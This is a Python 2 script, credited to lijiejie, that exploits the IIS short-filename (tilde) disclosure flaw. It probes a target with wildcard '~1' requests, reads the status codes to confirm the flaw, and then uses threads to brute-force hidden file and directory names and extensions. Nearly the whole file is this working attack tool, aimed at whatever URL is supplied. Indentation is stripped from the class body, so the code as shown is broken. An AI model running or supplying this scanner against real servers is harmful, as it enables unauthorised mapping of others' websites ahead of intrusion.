# encoding=gbk
# An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
import sys
import httplib
import urlparse
import string
import threading
import Queue
import time
import string
class Scanner():
def __init__(self, target):
self.target = target
self.scheme, self.netloc, self.path, params, query, fragment = \
urlparse.urlparse(target)
if self.path[-1:] != '/': # ends with slash
self.path += '/'
self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
self.files = []
self.dirs = []
self.queue = Queue.Queue()
self.lock = threading.Lock()
self.threads = []
def _conn(self):
try:
if self.scheme == 'https':
conn = httplib.HTTPSConnection(self.netloc)
else:
conn = httplib.HTTPConnection(self.netloc)
return conn
except Exception, e:
print '[Exception in function _conn]', e
return None
# fetch http response status code
def _get_status(self, path):
try:
conn = self._conn()
conn.request('GET', path)
status = conn.getresponse().status
conn.close()
return status
except Exception, e:
raise Exception('[Exception in function _get_status] %s' % str(e) )
# test weather the server is vulerable
def is_vul(self):
try:
status_1 = self._get_status(self.path + '/*~1****/a.aspx') # an existed file/folder
status_2 = self._get_status(self.path + '/l1j1e*~1****/a.aspx') # not existed file/folder
if status_1 == 404 and status_2 == 400:
return True
return False
except Exception, e:
raise Exception('[Exception in function is_val] %s' % str(e) )
def run(self):
# start from root path
for payload in self.payloads:
self.queue.put( (self.path + payload, '****') ) # filename, extention
for i in range(10):
t = threading.Thread(target=self._scan_worker)
self.threads.append(t)
t.start()
def report(self):
for t in self.threads:
t.join()
self._print('-'* 64)
for d in self.dirs:
self._print('Dir: ' + d)
for f in self.files:
self._print('File: ' + f)
self._print('-'*64)
self._print('%d Directories, %d Files found in toal' % (len(self.dirs), len(self.files)) )
def _print(self, msg):
self.lock.acquire()
print msg
self.lock.release()
def _scan_worker(self):
while True:
try:
url, ext = self.queue.get(timeout=3)
status = self._get_status(url + '*~1' + ext + '/1.aspx')
if status == 404:
self._print('Found ' + url + ext + '\t[scan in progress]')
if len(url) - len(self.path)< 6: # enum first 6 chars only
for payload in self.payloads:
self.queue.put( (url + payload, ext) )
else:
if ext == '****': # begin to scan extention
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + payload + '**') )
self.queue.put( (url,'') ) # also it can be a folder
elif ext.count('*') == 3:
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + ext[1] + payload + '*') )
elif ext.count('*') == 2:
for payload in string.ascii_lowercase:
self.queue.put( (url, '*' + ext[1] + ext[2] + payload ) )
elif ext == '':
self.dirs.append(url + '~1')
self._print('Found Dir ' + url + '~1\t[Done]')
elif ext.count('*') == 1:
self.files.append(url + '~1.' + ext[1:])
self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')
except Exception,e:
break
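# Command-line entry: check the URL given as the only argument and, if the
# server shows the short-name status difference, enumerate and report.
if len(sys.argv) == 1:
    print('Usage: %s target' % sys.argv[0])
    sys.exit()
target = sys.argv[1]
s = Scanner(target)
try:
    vulnerable = s.is_vul()
except Exception as e:
    # is_vul() raises when the server cannot be reached or the URL is
    # unusable.  Report that as a failed check with a non-zero exit status,
    # so it is not read as a "not vulnerable" result.
    print(e)
    sys.exit(1)
if not vulnerable:
    print('Sorry, server is not vulerable')
    sys.exit(0)
print('server is vulerable, please wait, scanning...')
s.run()
s.report()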